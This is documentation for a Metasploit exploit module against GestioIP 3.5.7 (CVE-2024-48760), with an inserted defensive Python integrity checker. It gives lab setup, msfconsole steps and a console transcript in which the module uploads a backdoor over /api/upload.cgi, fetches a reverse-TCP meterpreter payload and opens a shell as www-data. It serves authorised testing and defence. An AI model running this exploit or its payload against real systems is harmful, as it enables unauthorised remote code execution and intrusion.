
Gestioip Rce

documentation/modules/exploit/multi/http/gestioip_rce.md


Vulnerable Application

GestioIP is a web-based, automated IP address management (IPAM) software.

Description

This module exploits a Remote Code Execution (RCE) vulnerability in GestioIP 3.5.7, tracked as CVE-2024-48760. It is caused by an unsafe upload script that allows an authenticated user with admin rights on the website to overwrite the script file itself (/api/upload.cgi) with a backdoor file, which the web server then executes.
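A defender-side check for this weakness, added here as an example (it is not part of the Metasploit module or of GestioIP): because the exploit overwrites /api/upload.cgi and, once it has a session, writes the file back, a periodic hash comparison on its own can miss the attack window entirely. The script below records a SHA-256 hash together with the inode number and ctime (which, unlike mtime, cannot be set from user space with touch or utime) and reports both a file whose content changed and a file whose content is back to the baseline but was rewritten in between. The GestioIP web root path is an assumption to be set for your install; the watched file is the one named in the description above.

```python
"""File-integrity check for the GestioIP upload script.

Added example, not code from the Metasploit module or from GestioIP.
Watched path is api/upload.cgi relative to the web root (from the advisory
text); DEFAULT_WEBROOT is an assumption and should be overridden.
"""
import hashlib
import json
import os
import sys

DEFAULT_WEBROOT = "/var/www/gestioip"  # assumption: set to your install's web root
WATCHED = ["api/upload.cgi"]           # the file the exploit overwrites


def fingerprint(path: str) -> dict:
    """Hash the file and capture inode metadata.

    mtime can be forged by an attacker (touch -r, os.utime); ctime is set by the
    kernel on every write or metadata change and cannot be set from user space,
    so both are kept and ctime is the one trusted for 'was this rewritten'.
    """
    st = os.stat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size, "inode": st.st_ino,
            "mtime_ns": st.st_mtime_ns, "ctime_ns": st.st_ctime_ns}


def baseline(webroot: str, files=WATCHED) -> dict:
    """Record fingerprints of the watched files (run once on a known-good install)."""
    return {rel: fingerprint(os.path.join(webroot, rel)) for rel in files}


def compare(webroot: str, base: dict) -> list:
    """Return (relative_path, finding) for every watched file that deviates.

    content-changed  hash differs: the script was replaced (an update or a backdoor)
    rewritten        hash matches but ctime or inode moved: the file was overwritten
                     and put back, which is what the module's cleanup step leaves behind
    missing          file is gone
    """
    findings = []
    for rel, old in base.items():
        path = os.path.join(webroot, rel)
        if not os.path.exists(path):
            findings.append((rel, "missing"))
            continue
        new = fingerprint(path)
        if new["sha256"] != old["sha256"]:
            findings.append((rel, "content-changed"))
        elif new["ctime_ns"] != old["ctime_ns"] or new["inode"] != old["inode"]:
            findings.append((rel, "rewritten"))
    return findings


def main(argv):
    if len(argv) != 4 or argv[1] not in ("baseline", "check"):
        print(f"usage: {argv[0]} baseline|check <webroot> <baseline.json>", file=sys.stderr)
        return 2
    mode, webroot, store = argv[1:]
    if mode == "baseline":
        with open(store, "w") as f:
            json.dump(baseline(webroot), f, indent=2)
        return 0
    with open(store) as f:
        base = json.load(f)
    findings = compare(webroot, base)
    for rel, what in findings:
        print(f"{what}: {rel}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Take the baseline on a clean install (`baseline <webroot> base.json`), then run `check` from cron or a FIM hook. A content-changed finding is either a legitimate update or a planted backdoor; a rewritten finding with identical content is the more interesting one, and is worth correlating with the web server access log for requests to /api/upload.cgi around that ctime.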

Testing

Setup environment

To quickly set up a vulnerable environment for testing, fetch a Docker Compose setup with the right version from GitHub and run it.

  1. Get the Docker Compose setup from GitHub:
```bash
wget https://github.com/muebel/gestioip-docker-compose/archive/main.zip
unzip main.zip
rm main.zip
mv gestioip-docker-compose-main gestioip-docker-compose
```

This setup starts two Docker containers, one with the vulnerable version of GestioIP and one with a MySQL database.

  2. Run the Docker setup. Make sure Docker and Docker Compose are installed and that port 80 is free, or change the port in the .env file:
```bash
$ docker-compose up -d
```

Expected result:

```bash
$ docker ps
CONTAINER ID   IMAGE                    COMMAND                  CREATED       STATUS       PORTS                  NAMES
88b10cf6ffb8   gestioip/gestioip:3555   "/gestioip_install/s…"   1 hours ago   Up 1 hours   0.0.0.0:80->80/tcp   gip
0d5efce2dfa7   mysql:5                  "docker-entrypoint.s…"   1 hours ago   Up 1 hours   3306/tcp, 33060/tcp    gip-mysql
```

The web application is now available on http://localhost or http://<CONTAINER_IP>. You can log in with the default credentials gipadmin:PASSWORD, or change them in the .env file.

Options

This module requires an authenticated user with admin rights on the website to be able to upload the backdoor file.

USERNAME (required)

The username of the target user with admin rights to authenticate with.

PASSWORD (required)

The password of the target user with admin rights to authenticate with.

Verification Steps

  1. Start msfconsole
  2. Do: use gestioip_rce
  3. Do: set USERNAME <USERNAME>
  4. Do: set PASSWORD <PASSWORD>
  5. Do: set RHOSTS <TARGET_IP>
  6. Do: set LHOST <YOUR_IP>
  7. Do: set LPORT <YOUR_PORT>
  8. Do: set FETCH_COMMAND <FETCH_COMMAND> (optional, default is WGET; CURL, FTP, TFTP and TNFTP are also accepted)
  9. Do: check
  10. Do: run
  11. You should get a meterpreter session.

Scenarios

```bash
./msfconsole
msf >  use gestioip_rce

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  exploit/multi/http/gestioip_rce  2025-01-14       normal  Yes    GestioIP 3.5.7 Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gestioip_rce

[*] Using exploit/multi/http/gestioip_rce
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/gestioip_rce) > set PASSWORD PASSWORD
PASSWORD => PASSWORD
msf exploit(multi/http/gestioip_rce) > set LHOST 10.20.0.1
LHOST => 10.20.0.1
msf exploit(multi/http/gestioip_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/gestioip_rce) > set RHOSTS 10.20.0.2
RHOSTS => 10.20.0.2
msf exploit(multi/http/gestioip_rce) > show options

Module options (exploit/multi/http/gestioip_rce):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  PASSWORD         yes       The password to auth with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, socks4, socks5, sapni, socks5h
   RHOSTS    10.20.0.2        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80               yes       The target port (TCP)
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  gipadmin         yes       The username to auth as with admin right
   VHOST                      no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Acce
                                              pted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           10.20.0.1        yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      WfVcyBXPYscJ     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/unix Command



View the full module info with the info, or info -d command.
msf exploit(multi/http/gestioip_rce) > check
[*] Checking if the target is reachable...
[+] 10.20.0.2:80 - The target is vulnerable. File upload successful, the target is vulnerable GestioIP
msf exploit(multi/http/gestioip_rce) > run
[*] Started reverse TCP handler on 10.20.0.1:4444 
[*] Upload the backdoor file ...
[+] Backdoor file successfuly upload
[*] Executing payload on the target server ...
[*] Sending stage (3090404 bytes) to 10.20.0.2
[*] Cleaning up backdoor file on target server ...
[*] Meterpreter session 1 opened (10.20.0.1:4444 -> 10.20.0.2:55726) at 2026-03-11 10:06:46 +0100
[+] Payload successfully executed

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : a1706469c90a
OS           : Ubuntu 20.04 (Linux 6.17.0-12-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```